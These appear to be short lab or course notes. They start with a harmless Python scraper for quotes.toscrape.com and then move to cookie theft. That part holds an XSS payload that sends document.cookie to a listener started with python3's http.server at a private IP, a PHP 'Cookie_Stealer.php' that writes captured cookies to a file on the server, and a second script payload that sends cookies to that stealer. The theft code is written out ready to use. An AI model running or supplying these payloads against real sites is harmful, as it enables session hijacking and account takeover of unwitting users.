Scraping Data, html
  #!/usr/bin/python
  ### Imports ###
  import lxml.html
  import requests
   
  ### Grabs the webpage ###
  page = requests.get('http://quotes.toscrape.com')
  tree = lxml.html.fromstring(page.content)
   
  ### Outlines the tag you want to grab ###
  # Change //small[...[ to whatever tag. Leave /text() as is
  results = tree.xpath('//small[@class="author"]/text()')
  
  ### Prints it out ###
  print ('Results: ',results)
  


 run on opstation: 
  python3 -m http.server using   <script>document.location="http://10.50.38.82:8000/"+document.cookie;</script>




<?php
$cookie = $_GET["username"]
$steal = fopen("/var/www/html/uploads/cookiefile.txt", "a+");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>
(Cookie_Stealer.php)

using      <script>document.location="http://serveripport/uploads/cookie_stealer.php?username="+document.cookie;</script>

